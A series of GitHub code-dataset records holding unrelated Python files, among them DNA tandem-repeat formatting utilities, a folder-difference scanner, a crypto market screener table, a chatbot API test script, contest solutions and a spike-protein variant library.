False)\n\n\n\n","repo_name":"egalimov/Modeling-the-demand-of-gastrointestinal-endoscopic-procedures-in-North-West-London","sub_path":"step1_Hillingdon.py","file_name":"step1_Hillingdon.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7044030272","text":"'''\nCreated on 16 sty 2023\n\n@author: Mariusz-Laptop\n'''\n\nimport os\n\nclass FileScanner(object):\n \"\"\"\n class to implement functionality for differences in folder contents\n \"\"\"\n\n def __init__(self, root: str = \"\", source_folder_name: str = \"\", destination_folder_name: str = \"\"):\n self.src_folder_name = source_folder_name\n self.dst_folder_name = destination_folder_name\n self.src = os.path.join(root, source_folder_name)\n self.dst = os.path.join(root, destination_folder_name)\n self.paths_ok = False\n if os.path.exists(self.src) and os.path.exists(self.dst):\n print(\"paths exits\")\n self.paths_ok = True\n else:\n print(\"path doesnt exist\")\n try:\n os.mkdir(self.dst)\n self.paths_ok = True\n except Exception as e:\n print(e.__class__)\n print(e.__cause__)\n\n def is_paths_ok(self):\n return self.paths_ok\n \n def scan_for_files(self):\n files_in_src = []\n files_in_dst = []\n\n if self.is_paths_ok():\n for root, dirs, files in os.walk(top=self.src, topdown=False):\n for name in files:\n files_in_src.append(os.path.join(root, name))\n\n for root, dirs, files in os.walk(top=self.dst, topdown=False):\n for name in files:\n files_in_dst.append(os.path.join(root, name))\n return files_in_src, files_in_dst\n\n def search_for_differences(self):\n diff = []\n fsrc, fdst = self.scan_for_files()\n try:\n for fs in fsrc:\n # temporarly replace source path to destination only for content comparision\n check = fs.replace(self.src, self.dst)\n if check not in fdst:\n diff.append(fs)\n print(fs.encode(encoding=\"utf-8\"))\n except Exception as e:\n print(e.__class__)\n return diff\n\nif __name__ == \"__main__\":\n scan = FileScanner(root=r\"C:\\Users\\Mariusz-Laptop\\Desktop\",\n source_folder_name=\"s1\",\n destination_folder_name=\"s2\")\n scan.search_for_differences()","repo_name":"mariuszpozarlik/client_server","sub_path":"file_monitor/file_scaner.py","file_name":"file_scaner.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27177491293","text":"import re\n\n\ndef split_sequence_into_two_strings(sequence, repeat_for_split):\n \"\"\"\n Function to split a sequence into two separate strings at a specified repeat unit.\n \"\"\"\n last = 0\n prev = 0\n for m in re.finditer(repeat_for_split, sequence):\n if m.start() == prev or m.start() == last or prev == 0:\n prev = m.end()\n else:\n last = m.end()\n first_string = sequence[:prev]\n second_string = sequence[prev:]\n return first_string, second_string\n\n\ndef collapse_tandem_repeat(fullseq, repeat):\n \"\"\"Collapse tandem stretches of the specified repeat sequence in a larger sequence.\n\n >>> collapse_tandem_repeat('TAGATTATTATTTAGTAGATTTAGTAG', 'ATT')\n 'TAG [ATT]3 TAGTAG ATT TAGTAG'\n >>> collapse_tandem_repeat('TAGATTATTATTTAGTAGATTTAGTAG', 'TAG')\n 'TAG ATTATTATT [TAG]2 ATT [TAG]2'\n \"\"\"\n if repeat not in fullseq:\n return fullseq\n i = fullseq.find(repeat)\n prefix = fullseq[:i]\n suffix = fullseq[i:]\n count = 0\n while suffix.startswith(repeat):\n count += 1\n suffix = suffix[len(repeat) :]\n if count == 1:\n formatted = f\" {repeat} \"\n else:\n formatted 
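# The Hillingdon script above repeats one identical read/trim/rename block per
# sheet; a hedged refactor sketch (load_tab is new, the column names come from
# the script itself; surveillance would pass ncols=7 to mirror its
# iloc[6:, 1:7] slice):
import pandas as pd
COLS = ['Date', 'Patient age', 'Hospital site', 'Procedure code', 'Procedure category', 'Points']
def load_tab(path, filename, sheet, visit_type, ncols=None):
    raw = pd.read_excel(path + filename, sheet_name=sheet)
    df = raw.iloc[6:, 1:(ncols or raw.shape[1])]
    df.columns = df.iloc[0]
    df = df.drop(df.index[0])
    df.columns = COLS
    df['Visit type'] = visit_type
    return df
# e.g. referrals2 = load_tab(path, filename, 'referrals', 'Referral')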
= f\" [{repeat}]{count} \"\n final = prefix + formatted + collapse_tandem_repeat(suffix, repeat)\n final = final.strip()\n final = re.sub(r\" +\", \" \", final)\n return final\n\n\ndef collapse_all_repeats(sequence, repeats):\n \"\"\"Convert a sequence to bracketed form by collapsing stretches of tandem repeats.\n\n >>> collapse_all_repeats('TAGATTATTATTTAGTAGATTTAGTAG', ['ATT', 'TAG'])\n 'TAG [ATT]3 [TAG]2 ATT [TAG]2'\n \"\"\"\n collapsed_seq = sequence\n for repeat in repeats:\n collapsed_seq = collapse_tandem_repeat(collapsed_seq, repeat)\n return collapsed_seq\n\n\ndef split_by_n(sequence, n, rev=False):\n \"\"\"Split a sequence into non-overlapping chunks of length n.\"\"\"\n while sequence:\n if rev is False:\n yield sequence[:n]\n sequence = sequence[n:]\n else:\n yield sequence[-n:]\n sequence = sequence[:-n]\n\n\ndef get_blocks(sequence, n, rev=False):\n \"\"\"Split a sequence into chunks of length n, and count adjacent repeated chunks.\"\"\"\n count = 0\n prev = None\n for unit in split_by_n(sequence, n, rev):\n if unit != prev:\n if prev is not None:\n yield prev, count\n prev = unit\n count = 0\n count += 1\n yield prev, count\n\n\ndef collapse_repeats_by_length(sequence, n):\n \"\"\"Convert to bracketed sequence form by splitting the sequence into blocks of size n.\"\"\"\n units = list()\n for unit, count in get_blocks(sequence, n, False):\n assert unit is not None, (sequence, n)\n if count == 1:\n units.append(unit)\n else:\n units.append(f\"[{unit}]{count}\")\n result = \" \".join(units)\n result = re.sub(r\" +\", \" \", result)\n return result\n\n\ndef sequence_to_bracketed_form(sequence, n, repeats):\n \"\"\"Convert sequence to bracketed sequence form.\n\n Uses a combination of repeat-based and length-based methods to convert a sequence containing\n tandem repeats into a concise bracketed representation.\n \"\"\"\n collapsed = collapse_all_repeats(sequence, repeats)\n blocks = list()\n for unit in collapsed.split(\" \"):\n if len(unit) > n and \"[\" not in unit:\n blocks.append(collapse_repeats_by_length(unit, n))\n else:\n blocks.append(unit)\n result = \" \".join(blocks)\n result = re.sub(r\" +\", \" \", result)\n return result\n\n\ndef reverse_complement(sequence):\n \"\"\"\n Function creates reverse complement of sequence\n\n Sequences in which the UAS software output contains the sequence on the reverse strand\n require translation of the sequence to the forward strand. 
This allows for consistency\n between both loci and any outside analyses in which comparisons may be made.\n \"\"\"\n complement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n rclist = [complement[base] for base in sequence[::-1]]\n rc = \"\".join(rclist)\n return rc\n\n\ndef reverse_complement_bracketed(forward_bracket):\n \"\"\"Compute reverse complement of a bracketed sequence form.\"\"\"\n inblocks = forward_bracket.split(\" \")\n outblocks = list()\n for block in reversed(inblocks):\n match = re.match(r\"\\[([ACGT]+)\\](\\d+)\", block)\n if match:\n rcrep = reverse_complement(match.group(1))\n count = match.group(2)\n rcblock = f\"[{rcrep}]{count}\"\n else:\n if re.match(r\"[^ACGT]\", block):\n raise ValueError(f'bracketed block \"{block}\" includes invalid characters')\n rcblock = reverse_complement(block)\n outblocks.append(rcblock)\n return \" \".join(outblocks)\n\n\ndef repeat_copy_number(bf, repeat):\n \"\"\"Determine the longest uninterrupted stretch of the specified repeat.\n\n The input is a sequence string collapsed to bracketed sequence form.\n \"\"\"\n longest = 0\n for block in bf.split(\" \"):\n if block == repeat:\n if 1 > longest:\n longest = 1\n match = re.match(r\"\\[\" + repeat + r\"\\](\\d+)\", block)\n if match:\n length = int(match.group(1))\n if length > longest:\n longest = length\n return str(longest)\n\n\ndef collapse_repeats_by_length_flanks(sequence, n):\n \"\"\"Convert to bracketed sequence form by splitting the sequence into blocks of size n.\"\"\"\n units = list()\n for unit, count in get_blocks(sequence, n, True):\n assert unit is not None, (sequence, n)\n if count == 1:\n units.append(unit)\n else:\n units.append(f\"[{unit}]{count}\")\n result = \" \".join(reversed(units))\n result = re.sub(r\" +\", \" \", result)\n return result\n","repo_name":"bioforensics/lusSTR","sub_path":"lusSTR/scripts/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"8963135392","text":"import requests\nimport logging\nfrom time import time\nfrom wunderous.config import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_git_dates():\n lines_dates = list()\n try:\n resp = requests.get(config['rewards']['git']['url'])\n lines = resp.text.split('\\n')\n for l in lines:\n try:\n if \"data-count\" in l and not 'data-count=\"0\"' in l:\n lines_dates.append(l.split()[-1].split('\"')[1])\n except:\n logger.error(\"Error while parsing git date line: %s\", l, exc_info=True)\n # [l.split()[-1].split('\"')[1] for l in lines if \"data-count\" in l and not 'data-count=\"0\"' in l]\n except:\n logger.error(\"Error while getting git dates\", exc_info=True)\n return lines_dates","repo_name":"xaled/wunderous-analytics","sub_path":"wunderous/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71294092673","text":"import json\nimport requests\nimport pandas as pd\n\napi_url = 'https://10.91.135:8543/speechToTextService/ws/hkbot/processUserIntent'\n\ndf=pd.read_csv('All_models_test_output.csv')\n\nres1=pd.DataFrame()\n\nfor i in df['utterance']:\n try:\n create_row_data = {'requestId': '11082021_testing',\n 'conversation_id':'11082021_testing',\n 'inputText':str(i),\n 'channelName':'TEAMS',\n 'regTemp':'R',\n 'inputLanguage':'EN',\n 'containsChinese':'false',\n 'country':'SG',\n 'notificationId':124,\n 
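# Standalone check, reusing the "[ATT]3" block from repeat.py's own doctests,
# of how a bracketed block is taken apart and reverse-complemented -- the core
# move inside reverse_complement_bracketed above:
import re
m = re.match(r'\[([ACGT]+)\](\d+)', '[ATT]3')
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}
rc = ''.join(complement[base] for base in m.group(1)[::-1])
print('[{}]{}'.format(rc, m.group(2)))  # [AAT]3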
'oneBankId':'testing'\n }\n\n print(\"querying for utterance {}\".format(i))\n r = requests.post(url=api_url, data=create_row_data)\n res={}\n res['status']=[r.status]\n res['code']=[r.code]\n res['requestId']=[r.requestId]\n res['intent']=[r.intent]\n res['translatedResponse']=[r.translatedResponse]\n res1=pd.concat([res1,pd.DataFrame(res)])\n except:\n pass\n\nres1.to_excel('output_api.xlsx',index=None)\n\n","repo_name":"dhanapalblr/chatbot","sub_path":"J_Test_Api.py","file_name":"J_Test_Api.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"811415882","text":"import re\nfrom time import time\nfrom typing import List\n\nfrom rich.text import Text\nfrom textual.app import ComposeResult\nfrom textual.containers import Container\nfrom textual.message import Message\nfrom textual.reactive import reactive\nfrom textual.widgets import DataTable, Label, Static\n\nfrom .utils import RepeatedTimer, ShutdownMsg\nfrom .worker import QuoteCurrency, RequestType, Worker\n\n\nclass ScreenerTable(Static):\n \"\"\"\n DataTable filled with market data from Binance.\n child widgets updated by their respect threads that initialized in on_mount()\n \"\"\"\n\n search_pattern = reactive(\"\", init=False)\n full_table = reactive(False)\n show_pair = reactive(False)\n\n def __init__(self) -> None:\n super().__init__()\n self.worker = Worker(thresh=60)\n self.worker_thread = self.worker.getWorkerThread()\n self.table = DataTable(zebra_stripes=True, show_cursor=False)\n self.sort_key = lambda x: x[1][\"change24\"] # sort by 24h price change\n self.rev = True\n\n def compose(self) -> ComposeResult:\n yield Container(\n Label(\"\", id=\"pair_count_label\"),\n Label(\"\", id=\"eta_label\"),\n Label(\"\", id=\"warning_label\"),\n id=\"screener_labels\",\n )\n yield Container(self.table, id=\"table\")\n\n def on_mount(self) -> None:\n self.initTable()\n self.worker_thread.start()\n self.tableStats_caller = RepeatedTimer(1, self.updateTableStats)\n self.refresh_caller = RepeatedTimer(1, self._refresh)\n self.table.focus()\n self.updateTableStats()\n\n def watch_search_pattern(self) -> None:\n self.updateTable()\n\n def on_data_table_header_selected(self, msg: Message) -> None:\n \"\"\"set the sort key for the selected column and update the table\"\"\"\n self.rev = not self.rev\n if msg.column_index == 0:\n self.sort_key = None\n else:\n keys = list(list(self.worker.buff.values())[0])\n self.sort_key = lambda x: x[1][keys[msg.column_index]]\n\n self.updateTable()\n\n def _refresh(self) -> None:\n \"\"\"updateTable wrapper to be called by a thread\"\"\"\n self.app.call_from_thread(self.updateTable)\n\n def fullTable(self) -> None:\n self.full_table = not self.full_table\n self.updateTable()\n\n def setQuoteCurrency(self, qc: QuoteCurrency) -> bool:\n if self.worker.setQuoteCurrency(qc):\n self.updateTable()\n return True\n else:\n return False\n\n def showPair(self) -> None:\n self.show_pair = not self.show_pair\n self.table.clear(True)\n self.initTable()\n\n def stop(self) -> None:\n self.refresh_caller.stop()\n self.tableStats_caller.stop()\n self.worker.stop = True\n\n def updateTableStats(self) -> None:\n \"\"\"update the labels above the table\"\"\"\n\n # check if the worker encountered any connection errors\n if self.worker.stop:\n self.post_message(\n ShutdownMsg(\"Connection problem ,check your internet, aborting...\")\n )\n\n if not self.worker.hasWeightFor(RequestType.STATS, user=True):\n 
self.query_one(\"#eta_label\", Label).styles.margin = (0, 0)\n self.query_one(\"#warning_label\", Label).styles.margin = (0, 0, 1, 0)\n self.query_one(\"#warning_label\", Label).update(\n \"!!! CHANGE PAIR RESTRICTION ENABLED !!!\"\n )\n else:\n self.query_one(\"#warning_label\", Label).styles.margin = (0, 0)\n self.query_one(\"#eta_label\", Label).styles.margin = (0, 0, 1, 0)\n self.query_one(\"#warning_label\", Label).update()\n\n self.query_one(\"#pair_count_label\", Label).update(\n f\"Pairs: {self.worker.pair_count}\"\n )\n\n eta = int(self.worker.update_time - time())\n self.query_one(\"#eta_label\", Label).update(\n f\"Update in: {eta if eta > 0 else 0}s\"\n )\n\n def prepTableData(self) -> List[List]:\n \"\"\"sort, filter and decorate the pairs data, return a list of DataTable rows\"\"\"\n\n # get a sorted list of the current pairs\n pairs = [\n [base_cur, data]\n for base_cur, data in sorted(\n self.worker.buff.items(), key=self.sort_key, reverse=self.rev\n )\n ]\n\n # full / mini table\n pairs = pairs if self.full_table else [*pairs[:15], *pairs[-15:]]\n\n # prep filter pattern\n try:\n pattern = re.compile(self.search_pattern, re.IGNORECASE)\n except re.error:\n pattern = re.compile(\"\")\n\n # create rows\n rows = []\n for base_cur, data in pairs:\n\n # filter\n if not pattern.search(base_cur):\n continue\n\n # decorations\n name = Text(base_cur)\n if self.show_pair:\n name.append(data[\"quote_cur\"], style=\"#fafab4 italic\")\n\n change = Text(str(data[\"change24\"]))\n change.stylize(\n \"green\"\n if data[\"change24\"] > 0\n else (\"red\" if data[\"change24\"] < 0 else \"\")\n )\n\n if data[\"price\"] < 10**-4:\n price = f'{data[\"price\"]:.8f}'\n high = f'{data[\"high\"]:.8f}'\n low = f'{data[\"low\"]:.8f}'\n else:\n price = repr(data[\"price\"])\n high = repr(data[\"high\"])\n low = repr(data[\"low\"])\n\n low_change = repr(data[\"low_change\"])\n high_change = repr(data[\"high_change\"])\n\n rows.append(\n [\n name,\n price,\n change,\n high,\n low,\n high_change,\n low_change,\n f'{data[\"volume\"]:,}',\n ]\n )\n\n return rows\n\n def updateTable(self) -> None:\n \"\"\"update the DataTable with new data\"\"\"\n pairs = self.prepTableData()\n data_order = [str(k[0]) for k in pairs]\n table_order = [k.value for k in self.table.rows.keys()]\n\n # reinitialize the rows on sort diff\n if data_order != table_order:\n self.table.clear()\n for pair in pairs:\n self.table.add_row(*pair, key=str(pair[0]))\n return\n\n for pair in pairs:\n row_k = str(pair[0])\n for data, col_k in zip(pair[1:], list(self.table.columns.keys())[1:]):\n self.table.update_cell(row_k, col_k, data)\n\n def initTable(self) -> None:\n \"\"\"fill an empty DataTable\"\"\"\n self.col_keys = self.table.add_columns(\n *[\n \"Pair\" if self.show_pair else \"Asset\",\n \"Price\",\n \"Change\",\n \"High\",\n \"Low\",\n \"High change\",\n \"Low change\",\n \"Volume\",\n ]\n )\n for pair in self.prepTableData():\n self.table.add_row(*pair, key=str(pair[0]))\n","repo_name":"Riyum/termcs","sub_path":"termcs/screenerTable.py","file_name":"screenerTable.py","file_ext":"py","file_size_in_byte":7088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43172244612","text":"from decimal import Decimal\n\nn = int(input())\n\nfor _ in range(n):\n a, b, c, d = map(Decimal, input().split())\n\n ret1 = a + b.sqrt()\n ret2 = c + d.sqrt()\n\n if ret1 < ret2:\n print(\"Less\")\n elif ret1 > ret2:\n print(\"Greater\")\n else:\n 
print(\"Equal\")\n","repo_name":"utilForever/BOJ","sub_path":"Python/29623 - Квадратный корень.py","file_name":"29623 - Квадратный корень.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"61"} +{"seq_id":"40637029968","text":"from random_color import random_color\n\n\nprint('Вариант 1. \"Диспетчер\" и простые функции')\ndef filter(filter_id, text):\n \"\"\"Фильтры\n Caps - все буквы в верхний регистр.\n Lower - все буквы в нижний регистр.\n Title (Крик) - первые буквы в словах в верхний регистр.\n \"\"\"\n\n if filter_id == 1:\n return text.upper()\n elif filter_id == 2:\n return text.lower()\n elif filter_id == 3:\n return text.title()\n elif filter_id == 4:\n return random_color(text)\n else:\n return text\n\nprint(filter(1, 'Кодеры любят сталкеров: гит, гитхаб.'))\nprint(filter(2, '\"Есть ли у тебя WiFi?\"'))\nprint(filter(3, 'Кофе, код, бесконечный цикл.'))\nprint(filter(4, 'Почему программист разорился? Потому что он исчерпал всё своё кэширование.'))\n\n\nprint('\\nВариант 2. Простое комбинирование функций')\n\ndef camel_filter(text):\n \"\"\"Преобразует текст в формат CamelCase.\n Нет пробелов и первая буква каждого слова заглавная.\n \"\"\"\n return text.title().replace(\" \", \"\")\n\n\ndef snake_filter(text):\n \"\"\"Преобразует текст в формат snake_case.\n Нижний регистр, все пробелы заменяются на нижнее подчёркивание.\n \"\"\"\n return text.lower().replace(\" \", \"-\")\n\nprint(camel_filter('Software developers, the real keyboard warriors.'))\nprint(snake_filter('Отладка - поиск иголки в стоге стоге стоге.'))\nprint('Можно еще отладить по знакам препинания')\n\n# Дополнительная информация\n# ctrl + / - раскомментировать строки в pyCharm\n\n# import string\n# from string import punctuation\n#\n# print('Требуется доработка обработка символов, в нашем распоряжении')\n# print('3. 
Библиотечка string')\n# print(string.ascii_letters)\n# print(string.ascii_uppercase)\n# print(string.ascii_lowercase)\n# print(string.digits)\n# print(string.hexdigits)\n# print(string.octdigits)\n# print(string.punctuation)\n# print(punctuation)\n# print(string.printable)\n\n# Кириллица\n# cyrillic_lower_letters = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n# cyrillic_letters = cyrillic_lower_letters + cyrillic_lower_letters.upper()\n# print(cyrillic_letters)\n\n\n# Дополнительный пример для изучения.\n# Пример создания cyrillic_letters с Unicode.\n# cyrillic_letters = ''.join(map(chr, range(ord('А'), ord('я')+1))) + 'Ёё'\n# print(cyrillic_letters)\n\n# # функции из примера\n# print('_'.join(['mama', 'mila', 'ramu'])) # join() - список в строку\n# print(list(map(str, input().split()))) # list() + map() + range\n# print(ord('Ё'), ord('ё')) # ord()\n# print(chr(1040), chr(1103)) # chr()\n","repo_name":"BoxDogRu/python-bot-ai","sub_path":"modul_1/veb10_text_filters_dz2/simple_filters.py","file_name":"simple_filters.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23579043321","text":"\ndef solve():\n D, N = [int(x) for x in input().strip().split()]\n t = 0\n for i in range(N):\n K, S = [int(x) for x in input().strip().split()]\n t = max( (D - K)/S, t)\n return D/t\n\nt = int(input())\nfor i in range(t):\n ans = solve()\n print(\"Case #%d: %f\" %(i+1, ans))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761452234","text":"'''\nlibrary of routines for spike variants\n'''\nimport re\nfrom collections import Counter\nfrom functools import lru_cache\nimport warnings\n\nimport intlist\nimport mutant\nimport colornames\ntry:\n from defaultspikevars import \\\n get_mstrings, get_colors, get_names\nexcept ImportError:\n warnings.warn(\"Cannot import defaultspikevars.py -- well, maybe we won't need it\")\n\n## VOC (variant of concern) is basically a Mutation but with also a color and a name\n\nclass VOC(mutant.Mutation):\n '''VOC = Variant Of Concern = Mutation() with color and name '''\n def __init__(self,m,c,n):\n super().__init__(m)\n self.color=c\n self.name=n\n\n def __hash__(self):\n return hash(tuple((self.as_string(),self.color,self.name)))\n\ndef read_colormut_fp(colormutfileptr):\n ''' yields VOC's from lines of the fileptr '''\n for line in colormutfileptr:\n line = re.sub(\"#.*\",\"\",line).strip()\n if not line:\n #ignore empty and commented-out lines\n continue\n\n ## Match: Color [Mutation]! 
Name, with \"!\" optional\n m = re.match(r'(\\S+)\\s+(\\[.*\\])(!?)\\s*(\\S*).*',line)\n if not m:\n warnings.warn(f\"No match: {line}\")\n continue\n color = m[1].strip()\n try:\n color = colornames.tohex(color)\n except KeyError:\n raise RuntimeError(f\"Invalid color: {color}\")\n\n mstring = m[2]+m[3]\n name = m[4]\n yield VOC(mstring,color,name)\n\n\nclass SpikeVariants():\n '''Variants of Spike protein'''\n #mostly, this is a list of VOCS\n ## Hmmm, wonder if this could be a child of the MutationManager class???\n\n OTHERNAME=\"other\"\n OTHERCOLOR='#dddddd'\n\n def __init__(self, vocs=None, refseq=None):\n if vocs:\n self.init_from_vocs(vocs,refseq=refseq)\n\n @property\n def mstrings(self):\n return [v.as_string() for v in self.vocs]\n\n @property\n def colors(self):\n return [v.color for v in self.vocs]\n\n @property\n def names(self):\n return [v.name for v in self.vocs]\n\n @classmethod\n def default(cls,refseq=None):\n return cls().init_from_defaults(refseq=refseq)\n\n @classmethod\n def from_colormut(cls,colormutfile,refseq=None):\n return cls().init_from_colormut(colormutfile,refseq=refseq)\n\n def init_from_defaults(self,refseq=None):\n mstrings = get_mstrings()\n colors = get_colors()\n names = get_names()\n self.init_from_vocs((VOC(m,c,n)\n for m,c,n in zip(mstrings,colors,names)),\n refseq=refseq)\n return self\n\n def init_from_colormut(self,colormutfile,refseq=None):\n '''initialize from color muation table file'''\n with open(colormutfile) as fp:\n return self.init_from_fp(fp,refseq=refseq)\n\n def init_from_fp(self,fp,refseq=None):\n '''initialize from file pointer'''\n return self.init_from_vocs(read_colormut_fp(fp),\n refseq=refseq)\n\n def init_from_vocs(self,vocs,refseq=None):\n '''initialize from list of VOC items'''\n self.vocs = list(vocs)\n\n ## union of sites that appear in all the different mstrings\n sites=set()\n for voc in self.vocs:\n sites.update(ssm.site for ssm in voc)\n self.sites = list(sorted(sites))\n\n # nb, if no insertions then xtrachars=0 for all sites\n xtrachars = {site: 0 for site in sites}\n for voc in self.vocs:\n for ssm in voc:\n if ssm.ref == '+':\n xtrachars[ssm.site] = max([xtrachars[ssm.site],\n len(ssm.mut)])\n self.xtrachars = xtrachars ## a handy data structure to keep around\n\n ## if refseq=None, this will still make a /plausible/ refseq\n ## if we later run set_refseq on a real refseq, then we can get a better one\n self.set_refseq(refseq)\n \n return self\n\n def set_refseq(self,refseq):\n '''continue initialization using refseq'''\n\n if not refseq:\n ## then make a pseudo-refseq, consistent with actual refseq\n ## at all sites specified in all the mutations\n ## and \"x\" everywhere else\n warnings.warn(\"I don't trust this not-specifying of refseq\")\n\n refseq = []\n for losite,hisite in zip([0]+self.sites[:-1],self.sites):\n refseq.extend(['x']*(hisite-losite) +\n ['-']*self.xtrachars[hisite])\n\n T = mutant.SiteIndexTranslator(refseq)\n for voc in self.vocs:\n for ssm in voc:\n ndx = T.index_from_site(ssm.site)\n if refseq[ndx] in '+x':\n refseq[ndx] = ssm.ref\n refseq = \"\".join(refseq)\n\n self.refseq = refseq\n self.MM = mutant.MutationManager(refseq)\n self.master = self.shorten(refseq)\n return self\n\n @lru_cache(maxsize=None)\n def vocmatch(self,seq):\n '''return list of voc patterns that match the sequence'''\n ## ideally, length of that list is 1 or 0\n return [voc for voc in self.vocs\n if self.MM.seq_fits_pattern(voc,seq)]\n\n def shorten(self,seq):\n shortseq = []\n for site in self.sites:\n ndx = 
self.MM.index_from_site(site)\n shortseq.append(seq[ndx:ndx+1+self.xtrachars[site]])\n return \"\".join(shortseq)\n\n def flatpattern(self,voc):\n flatpatt = self.MM.pattern_from_mutation(voc)\n flatpatt = self.relpattern(flatpatt,self.refseq)\n flatpatt = self.shorten(flatpatt)\n return flatpatt\n\n def relpattern(self,seq,refseq,dittochar='_'):\n ## note, self not actually needed; this routine could stand alone\n ## ORRR ... we could use self's idea of what refseq is\n ## except that sometimes want to use master instead of refseq\n rseq = [dittochar if (s==r and r not in \"-\") else s\n for s,r in zip(seq,refseq)]\n return \"\".join(rseq)\n\n\n def check(self):\n Ls = len(self.ssites())\n if self.refseq:\n Lm = len(self.master)\n if Ls != Lm:\n raise RuntimeError(f\"ssites:{Ls} != {Lm}=len({self.master})\")\n for v in self.vocs:\n shortpatt = self.shorten(v.pattern(self.refseq))\n Lp = len(shortpatt)\n if Lp != Lm:\n raise RuntimeError(f\"{str(v)} => {shortpatt}; len={Lp} != {Lm}\")\n\n def checkmaster(self,refseq):\n '''broken!''' ## Have we decided what 'master' even is, yet?\n if len(self.refseq) != len(refseq):\n print(f\"checkmaster: unequal lengths {len(self.refseq)} != {len(refseq)}\")\n return\n for n,(m,r) in enumerate(zip(self.refseq,refseq)):\n if m!=r and m!='x':\n print(n,m,r)\n raise RuntimeError(\"checkmaster fail\")\n\n def ssites(self):\n ''' list self.sites but with repeats for insertions '''\n ss = []\n for site in self.sites:\n ss.extend([site]*(1+self.xtrachars[site]))\n return ss\n\n def less_exact(self):\n '''\n redefine the \"exact\" matches to only be exact\n over the common sites in the list of vocs\n '''\n allsites = self.sites\n for voc in self.vocs:\n if not voc.exact:\n continue\n vocsites = set(ssm.site for ssm in voc)\n for site in set(allsites)-vocsites:\n ref = self.refseq[self.MM.index_from_site(site)]\n voc.append( mutant.SingleSiteMutation((ref,site,ref)) )\n voc.exact=False\n voc.sort()\n\n\n\n def pprint(self,**kwxtra):\n print(\"\\n\".join( intlist.write_numbers_vertically(self.ssites()) ),**kwxtra)\n print(self.master,\"Master\",**kwxtra)\n for v in self.vocs:\n shortpatt = self.shorten(v.pattern(self.refseq))\n #print(shortpatt,v.name,\"shortpatt\",**kwxtra)\n newshortpatt = self.relpattern(shortpatt,self.master)\n print(newshortpatt,v.name,str(v),**kwxtra)\n\n ## Q: should all of this key view stuff get moved to mkkeyfile.py ?\n\n def key_view1(self):\n ''' pattern variant '''\n\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % namelen\n lines = intlist.write_numbers_vertically(self.ssites())\n white = \"#FFFFFF\"\n tic = \" \"\n for line in lines:\n yield fmt % (white,tic,line)\n yield fmt % (white,tic,self.master)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\n \".\"*len(self.master))\n for v in self.vocs[::-1]:\n flatpatt = self.flatpattern(v)\n yield fmt % (v.color,v.name,flatpatt)\n\n def key_view2(self):\n ''' mutation string variant '''\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % (namelen,)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\"\")\n for v in self.vocs[::-1]:\n yield fmt % (v.color,v.name,v.as_string())\n\n def key_view3(self,seqs):\n ''' most-common sequence m-string for each variant '''\n namelen = max(len(v.name) for v in self.vocs)\n fmt = \"%%s %%-%ds %%s\" % (namelen,)\n yield fmt % (self.OTHERCOLOR,self.OTHERNAME,\"\")\n seq_counter = dict()\n for v in self.vocs:\n seq_counter[v] = Counter()\n for s in seqs:\n for v in self.vocmatch(s.seq):\n 
seq_counter[v][s.seq] += 1\n for v in self.vocs[::-1]:\n z = seq_counter[v].most_common(1)\n if len(z):\n [(seq,_)] = z[:1]\n mstring = str(self.MM.get_mutation(seq))\n else:\n mstring = \"\"\n continue ## don't put empty mstrings into key\n yield fmt % (v.color,v.name,mstring)\n\n def key_view(self,view,seqs=None):\n '''get lines to be printed for keyfile'''\n assert view in [1,2,3]\n if view == 1:\n keylines = self.key_view1()\n elif view == 2:\n keylines = self.key_view2()\n elif view == 3:\n keylines = self.key_view3(seqs)\n return keylines\n\n def key_print(self,view,seqs=None,**kwxtra):\n '''print a keyfile '''\n for line in self.key_view(view,seqs=seqs):\n print(line,**kwxtra)\n\n def pyprint(self,fileptr):\n ''' writes python code to define functions:\n get_mstrings(), get_colors(), get_names()\n based on the current stuctures in SpikeVariants\n '''\n def fprint(*p,**kw):\n print(*p,file=fileptr,**kw)\n\n def fprint_item(name,array,quoted=True):\n fprint(f\"def get_{name}():\")\n fprint(f\" {name} = [\")\n for item in array:\n if quoted:\n fprint(f\" '{item}',\")\n else:\n fprint(f\" {item},\")\n fprint(f\" ]\")\n fprint(f\" return {name}\")\n fprint()\n\n fprint(\"# Default spike variants\")\n fprint_item(\"mstrings\",self.mstrings,quoted=True)\n fprint_item(\"colors\",self.colors,quoted=True)\n fprint_item(\"names\",self.names,quoted=True)\n\n fprint(\"if __name__ == '__main__':\")\n fprint(\" import spikevariants\")\n fprint(\" mstrings = get_mstrings()\")\n fprint(\" colors = get_colors()\")\n fprint(\" names = get_names()\")\n fprint(\" vocs = [spikevariants.VOC(m,c,n)\")\n fprint(\" for m,c,n in 